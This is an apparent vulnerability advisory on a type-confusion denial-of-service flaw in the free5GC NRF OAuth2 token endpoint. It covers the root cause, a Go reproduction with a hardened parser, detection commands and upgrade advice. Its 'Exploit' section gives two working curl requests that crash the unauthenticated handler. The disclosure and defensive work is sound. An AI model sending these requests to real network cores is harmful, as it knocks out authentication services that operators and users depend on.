free5GC NRF, Type Confusion DoS, CVE-N/A (Medium)


The vulnerability resides in the NRF’s `/oauth2/token` endpoint handler. Its parser iterates over the fields of the `AccessTokenReq` struct using Go reflection. It has specific logic for string and `NfType` fields, but for all others it incorrectly assumes the field is of type `models.PlmnId`. An attacker can send a form-encoded POST request containing a JSON payload for any “other” field, such as `requesterPlmnList`. The parser unmarshals the JSON into a `models.PlmnId` object and then tries to assign it to the actual field in the request struct. This leads to a panic if the target field’s type is incompatible (e.g., a slice or a different struct). The Gin web framework recovers from the panic and returns an `HTTP 500` error, but the damage is done: the handler crashes, and a stack trace is generated. Critically, the `/oauth2/token` endpoint is unauthenticated by design, meaning any remote attacker can trigger the crash. The root cause is a type-confusion bug (CWE-843) in the form parser, leading to a denial-of-service (DoS) condition.
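The parser pattern the paragraph describes, reduced to a runnable Go sketch. This is an added example and not free5GC's code: `PlmnId`, `AccessTokenReq`, `vulnerableParse`, `hardenedParse` and `jsonName` are constructed stand-ins (the real NRF also special-cases `NfType` fields, which are omitted here). The vulnerable variant reproduces the `reflect.Set` panic on a slice field and recovers from it the way a Gin recovery middleware would (returning an error where the server would return `HTTP 500`); the hardened variant decodes each form value into a fresh value of the field's own declared type, so a mismatched payload becomes an ordinary decode error instead of a crash.

```go
package main

import (
	"encoding/json"
	"fmt"
	"reflect"
	"strings"
)

// Constructed, simplified stand-ins for the free5GC models (not the project's real types).
type PlmnId struct {
	Mcc string `json:"mcc"`
	Mnc string `json:"mnc"`
}

type AccessTokenReq struct {
	GrantType         string   `json:"grant_type"`
	RequesterPlmn     PlmnId   `json:"requesterPlmn,omitempty"`
	RequesterPlmnList []PlmnId `json:"requesterPlmnList,omitempty"` // slice field: the type-confusion target
}

// jsonName returns the form/JSON key for a struct field from its json tag.
func jsonName(f reflect.StructField) string {
	tag := f.Tag.Get("json")
	if i := strings.Index(tag, ","); i >= 0 {
		tag = tag[:i]
	}
	if tag == "" {
		return f.Name
	}
	return tag
}

// vulnerableParse mirrors the flawed pattern from the advisory: every non-string
// field is assumed to be a PlmnId, and the decoded value is assigned with
// reflect.Set without checking that the field can hold it. The deferred recover
// stands in for the web framework's panic recovery.
func vulnerableParse(form map[string]string) (req AccessTokenReq, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("handler panicked: %v", r)
		}
	}()
	v := reflect.ValueOf(&req).Elem()
	t := v.Type()
	for i := 0; i < t.NumField(); i++ {
		raw, ok := form[jsonName(t.Field(i))]
		if !ok {
			continue
		}
		fv := v.Field(i)
		if fv.Kind() == reflect.String {
			fv.SetString(raw)
			continue
		}
		var plmn PlmnId
		if err := json.Unmarshal([]byte(raw), &plmn); err != nil {
			return req, err
		}
		fv.Set(reflect.ValueOf(plmn)) // panics: PlmnId is not assignable to []PlmnId
	}
	return req, nil
}

// hardenedParse decodes each value into a new instance of the field's declared
// type, so the JSON shape is validated against the real field and a mismatch is
// reported as an error rather than triggering a reflect.Set panic.
func hardenedParse(form map[string]string) (AccessTokenReq, error) {
	var req AccessTokenReq
	v := reflect.ValueOf(&req).Elem()
	t := v.Type()
	for i := 0; i < t.NumField(); i++ {
		f := t.Field(i)
		raw, ok := form[jsonName(f)]
		if !ok {
			continue
		}
		fv := v.Field(i)
		if fv.Kind() == reflect.String {
			fv.SetString(raw)
			continue
		}
		target := reflect.New(f.Type) // pointer to a zero value of the field's own type
		if err := json.Unmarshal([]byte(raw), target.Interface()); err != nil {
			return AccessTokenReq{}, fmt.Errorf("field %s: %w", jsonName(f), err)
		}
		fv.Set(target.Elem()) // types match by construction, so this cannot panic
	}
	return req, nil
}

func main() {
	// Constructed form body: a JSON object sent for a field whose type is a slice.
	form := map[string]string{
		"grant_type":        "client_credentials",
		"requesterPlmnList": `{"mcc":"208","mnc":"93"}`,
	}
	_, err := vulnerableParse(form)
	fmt.Println("vulnerable:", err)
	_, err = hardenedParse(form)
	fmt.Println("hardened:  ", err)
}
```

The hardened loop still needs a recovery middleware in front of it for defence in depth, but with the type taken from the field itself there is no remaining path to `reflect.Set` with an incompatible value.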

DailyCVE Form

Platform: free5GC NRF
Version: v4.2.1
Vulnerability: Type Confusion
Severity: Medium (DoS)
Date: 2026-03-22

Prediction: fixed within 30 days

What Undercode Say (Analytics):

Log the exploit attempts:
sudo grep "panic: reflect.Set" /var/log/free5gc/nrf.log

Monitor NRF container health:
docker ps --filter "name=nrf" --format "table {{.Names}}\t{{.Status}}"

Check for repeated 500 errors on the endpoint:
sudo grep "POST /oauth2/token" /var/log/nginx/access.log | grep "500" | wc -l

Exploit:

Single request DoS by mismatching types (slice vs struct):
curl -i -X POST http://10.100.200.3:8000/oauth2/token -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode 'requesterPlmnList={"mcc":"208","mnc":"93"}'
curl -i -X POST http://10.100.200.3:8000/oauth2/token -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode 'targetNsiList={"mcc":"208","mnc":"93"}'

Protection from this CVE:

Upgrade to a patched version of free5GC. The fix is included in pull request free5gc/nrf83. If upgrading is not immediately possible, implement a Web Application Firewall (WAF) rule to block the specific vulnerable request patterns or deploy reverse proxy logic to sanitize input payloads.

Impact:

Availability: Remote, unauthenticated attackers can repeatedly crash the NRF’s token issuance handler, causing a denial of service and generating high-volume logs.
Confidentiality: None. The server returns empty `HTTP 500` responses.
Integrity: None. The panic occurs before any state change.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
